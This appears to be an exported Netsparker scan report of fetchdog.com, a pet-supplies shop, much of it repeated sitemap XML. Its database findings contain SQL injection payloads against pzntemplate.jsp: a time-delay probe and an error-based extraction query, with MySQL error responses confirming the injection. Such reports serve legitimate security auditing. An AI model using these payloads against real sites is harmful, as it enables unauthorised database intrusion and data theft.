<loc>http://www.fetchdog.com/pet-supplies/doggates/freestandingdoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/extrawidetall-doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/car-dog-gates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/alldog-groomin..
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
- /sitemap.xml
/sitemap.xml
|
Apache/2.0.52 (Red Hat)
Request
GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
ETag: W/"400408-1299053707000"
Last-Modified: Wed, 02 Mar 2011 08:15:07 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Type: application/xml
Content-Length: 28298
Date: Thu, 03 Mar 2011 01:50:42 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=209.234.250.14.1299117042599929; path=/; expires=Thu, 03-Mar-11 02:50:42 GMT
<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.fetchdog.com/Shop</loc> <lastmod>2011-03-02</lastmod> <changefreq>daily</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogharnesses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/housetraining/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogleashes/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/seniordog/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogramps-stairs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogsupplements/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtoys/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtraining-supplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtreats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/puppysupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/ecofriendly/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/holiday/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/discountdogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/charitable-shops/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/bestsellers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/newarrivals/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/personalized-dogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogproblem-solvers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/outdoordogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gift-certificates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-cratepads-covers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/home-gifts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/small-dog-shop/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-houses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-memorials/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/customer-favorites/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/elevated-feeders-waterers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-food-mats-storage/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doorway-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-gallery/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gates-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/beds-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/birthdayclub/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/Sizing/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/all-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/small-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/large-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pillows/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/donut-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-couches-bolster-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/orthopedic-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/nesting-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/outdoor-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pads-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/heated-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/travel-car-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/alldogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/alldogcar-travelsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/traveldogbowls/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseats-seatbelts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseatcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogbarriers-safety/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/travel-accessories/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/allclothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogsweaters-shirts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogcoats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogbackpacks-lifejackets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dog-safety-gear/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/alldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/smalldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/largedogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/leatherdogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogtrainingcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogidtags/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/alldogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogcouchcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogblankets-throws/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/alldogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcrates-pens/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcarriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/alldogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dogpoop-urineremoval/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dog-odorstain-removal/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/doglawntreatments/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/alldoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/freestandingdoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/extrawidetall-doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/car-dog-gates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/alldog-groomin..
Database Error Message
Database Error Message
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
';WAITFOR DELAY '0:0:25'--
|
skuid
|
GET
|
undefined
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid=%27;WAITFOR%20DELAY%20%270:0:25%27--&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 191
Date: Thu, 03 Mar 2011 01:50:46 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117046546029; path=/; expires=Thu, 03-Mar-11 02:50:46 GMT
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--' AND (skuid='undefined' OR skuid='')' at line 1
MySQL Database Identified
MySQL Database Identified
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
CONFIRMED
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 68
Date: Thu, 03 Mar 2011 01:50:47 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117047494799; path=/; expires=Thu, 03-Mar-11 02:50:47 GMT
Duplicate entry '_!@4dilemma:0' for key 1
Sitemap Identified
Sitemap Identified
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.
Impact
This issue is reported as extra information, there is no direct impact resulting from this.
- /sitemap.xml
/sitemap.xml
|
Request
GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
ETag: W/"400408-1299053707000"
Last-Modified: Wed, 02 Mar 2011 08:15:07 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Type: application/xml
Content-Length: 28298
Date: Thu, 03 Mar 2011 01:50:42 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=209.234.250.14.1299117042599929; path=/; expires=Thu, 03-Mar-11 02:50:42 GMT
<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.fetchdog.com/Shop</loc> <lastmod>2011-03-02</lastmod> <changefreq>daily</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogharnesses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/housetraining/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogleashes/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/seniordog/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogramps-stairs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogsupplements/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtoys/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtraining-supplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtreats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/puppysupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/ecofriendly/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/holiday/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/discountdogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/charitable-shops/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/bestsellers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/newarrivals/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/personalized-dogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogproblem-solvers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/outdoordogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gift-certificates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-cratepads-covers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/home-gifts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/small-dog-shop/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-houses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-memorials/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/customer-favorites/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/elevated-feeders-waterers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-food-mats-storage/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doorway-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-gallery/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gates-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/beds-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/birthdayclub/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/Sizing/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/all-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/small-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/large-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pillows/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/donut-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-couches-bolster-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/orthopedic-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/nesting-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/outdoor-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pads-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/heated-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/travel-car-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/alldogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/alldogcar-travelsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/traveldogbowls/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseats-seatbelts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseatcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogbarriers-safety/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/travel-accessories/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/allclothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogsweaters-shirts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogcoats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogbackpacks-lifejackets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dog-safety-gear/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/alldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/smalldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/largedogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/leatherdogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogtrainingcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogidtags/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/alldogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogcouchcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogblankets-throws/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> 